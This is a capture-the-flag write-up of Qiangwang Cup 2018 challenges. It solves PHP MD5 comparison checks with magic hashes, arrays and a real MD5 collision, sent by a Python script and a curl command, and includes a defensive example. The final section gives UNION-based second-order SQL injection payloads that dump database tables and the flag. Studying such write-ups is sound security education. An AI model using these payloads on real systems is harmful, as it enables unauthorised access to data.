Coasting through Qiangwang Cup (强网杯) 2018: writeup

welcome

The challenge hands you a BMP file. Least-significant-bit steganography turned up nothing, so I tried data offsets instead; the flag sits at offset 100.

flag: qwb{W3lc0me}

Web sign-in (web签到)

Challenge URL: `http://39.107.33.96:10000/`

Layer 1: loose comparison (`==`). PHP type juggling bypass: a string of the form 0e followed only by digits is a numeric string equal to 0, so all such MD5 digests compare equal to each other.

```php
if($_POST['param1']!=$_POST['param2'] && md5($_POST['param1'])==md5($_POST['param2'])){
    die("success!");
}
```

payload

```
param1=240610708&param2=QNKCDZO
```

Layer 2: strict comparison (`===`, which checks type as well as value). md5() cannot process an array argument and returns NULL, so two different arrays give NULL === NULL.

```php
if($_POST['param1']!==$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!");
}
```

payload

```
param1[]=1&param2[]=2
```

Layer 3: strict comparison plus a forced cast to string, so the array trick no longer works; what is needed is two genuinely different byte strings with the same MD5 digest, i.e. a real MD5 collision pair.

```php
if((string)$_POST['param1']!==(string)$_POST['param2'] && md5($_POST['param1'])===md5($_POST['param2'])){
    die("success!");
}
```

Reference script

```python
#!/usr/bin/env python3
import binascii
import hashlib
import requests

# Two 64-byte MD5 collision blocks, written as hex; they differ in only a few bytes.
param1 = """
0e306561559aa787d00bc6f70bbdfe34
04cf03659e704f8534c00ffb659c4c87
40cc942feb2da115a3f4155cbb860749
7386656d7d1f34a42059d78f5a8dd1ef
"""

param2 = """
0e306561559aa787d00bc6f70bbdfe34
04cf03659e744f8534c00ffb659c4c87
40cc942feb2da115a3f415dcbb860749
7386656d7d1f34a42059d78f5a8dd1ef
"""

print('[+] create raw byte strings to send as POST parameters [param1] and [param2]...')
param1 = ''.join(param1.split('\n'))
param2 = ''.join(param2.split('\n'))

# Raw bytes; requests form-encodes them itself, so no manual urlencode step is needed.
param1str = binascii.unhexlify(param1)
param2str = binascii.unhexlify(param2)

print('[+] calculate md5 value...')
print("md5(param1): " + hashlib.md5(param1str).hexdigest())
print("md5(param2): " + hashlib.md5(param2str).hexdigest())

print('[+] sending request...')

url = 'http://39.107.33.96:10000/'
payload = {'param1': param1str, 'param2': param2str}
headers = {'Cookie': 'PHPSESSID=on8uv0kfij2h7lm2uramtluo53', 'Host': '39.107.33.96:10000'}

resp = requests.post(url=url, headers=headers, data=payload)

print('[+] read FLAG from response...\n\n')
print(resp.content.decode(errors='replace'))
```

Note: if this challenge took its parameters via GET, it would be enough to URL-encode param1 and param2 and submit them; no urllib.unquote step would be needed.

Appendix: l3m0n's solution:

```sh
curl -v http://39.107.33.96:10000/ -H "Cookie: PHPSESSID=on8uv0kfij2h7lm2uramtluo53" --data "param1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&param2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2"
```

Flag: QWB{s1gns1gns1gnaftermd5}
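To see why layers 1 and 3 fall and what a defender should compare instead, here is an added Python example (not part of the original writeup or the challenge code). `php_loose_eq` is an approximation of PHP's numeric-string rule for `==`, the collision pair is the one l3m0n's curl command sends, and `hardened_passes` stands in for PHP's `hash_equals` over a SHA-256 digest.

```python
import hashlib
import hmac
import re

# PHP 5/7 rule (approximated): a string that looks like a number is compared
# numerically by `==`, so "0e462..." and "0e830..." are both 0 * 10**N == 0.0.
_NUMERIC = re.compile(r'[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?')

def php_loose_eq(a: str, b: str) -> bool:
    """Emulate PHP's loose `==` on two strings."""
    if _NUMERIC.fullmatch(a) and _NUMERIC.fullmatch(b):
        return float(a) == float(b)
    return a == b

def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()

def layer1_passes(p1: str, p2: str) -> bool:
    """Layer 1 as written: loose `!=` on the inputs, loose `==` on the hex digests."""
    return (not php_loose_eq(p1, p2)
            and php_loose_eq(md5_hex(p1.encode()), md5_hex(p2.encode())))

def layer3_passes(p1: bytes, p2: bytes) -> bool:
    """Layer 3: strict inequality of the strings plus strict equality of the digests."""
    return p1 != p2 and md5_hex(p1) == md5_hex(p2)

def hardened_passes(p1: bytes, p2: bytes) -> bool:
    """Defender's version: collision-resistant hash, constant-time strict compare.
    Magic hashes fail (strict compare) and the public MD5 collision fails (SHA-256)."""
    return p1 != p2 and hmac.compare_digest(
        hashlib.sha256(p1).hexdigest(), hashlib.sha256(p2).hexdigest())

# Marc Stevens' public single-block MD5 collision: the two 64-byte values that
# l3m0n's curl command above sends as param1 and param2 (decoded from its URL encoding).
COLLISION_A = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2")
COLLISION_B = bytes.fromhex(
    "4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518"
    "afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2")

if __name__ == "__main__":
    print("layer 1, magic hashes:", layer1_passes("240610708", "QNKCDZO"))     # True
    print("layer 3, real collision:", layer3_passes(COLLISION_A, COLLISION_B))  # True
    print("sha256 + hash_equals:", hardened_passes(COLLISION_A, COLLISION_B))   # False
```

The takeaway for code review is that `===` only closes the type-juggling hole; a check that accepts "different inputs, same digest" is still broken as long as the digest is MD5.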

Three hit

Challenge URL: `http://39.107.32.29:10000`

This challenge is a second-order injection: on registration the user's age is stored in the database, and after a successful login the profile.php page queries the database for usernames that have the same age.

Second-order injection comes from developers trusting data that is already in the database too much: whenever user-supplied data is read back out of the database and used without sanitisation, a second-order injection can be triggered.

During testing, age had to be numeric, so the payload was hex-encoded to get past that check.

payload

```sql
-- Find the injection point (column count):
1 and 1=2 union select 1#
1 and 1=2 union select 1,2#
1 and 1=2 union select 1,2,3,4#

-- three hit: dump the database name, then the tables, then the columns
1 and 1=2 union select 1,(select database()),3,4#
1 and 1=2 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='qwb'),3,4#
1 and 1=2 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4#
1 and 1=2 union select 1,(select flag from flag),3,4#
```
